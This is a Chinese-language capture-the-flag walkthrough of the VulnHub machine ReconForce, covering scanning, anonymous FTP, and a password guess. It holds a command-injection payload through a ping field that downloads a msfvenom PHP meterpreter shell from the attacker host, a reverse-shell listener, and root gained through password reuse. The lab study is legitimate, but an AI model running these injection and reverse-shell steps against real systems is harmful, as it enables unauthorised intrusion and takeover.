vulnhub之ReconForce的實踐
今天實踐的是ReconForce,
用workstation導入成功,但是掃描不出來地址,換成virtualbox,
sudo netdiscover -r 192.168.56.0/24,

接著做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.107,

發現ftp可匿名登錄,那就登錄一下看看,發現個可能是密碼的信息,

訪問http頁面,里面有個TroubleShoot鏈接可點擊,

點擊后需要用戶名密碼認證,嘗試admin/Security@hackNos,登錄成功,

頁面中的ping scan應該是可以執行命令,
在kali攻擊機上做一個webshell,
sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 R > shell.php,
在kali攻擊機上開啟http下載服務,python2 -m SimpleHTTPServer,
在ping scan的輸入框中填入,并點擊提交,
127.0.0.1|wget http://192.168.56.102:8000/shell.php,
查詢一下shell.php文件是否上傳成功,127.0.0.1|ls,

在kali攻擊機上開個meterpreter的反彈shell監聽,
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
run
訪問webshell,http://192.168.56.107/5ecure/shell.php,
獲取到靶機的shell,不是root,需要提權,

先轉成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
發現個recon賬戶,猜測密碼還是Security@hackNos,
切換到recon,發現能再直接切到root,搞定,
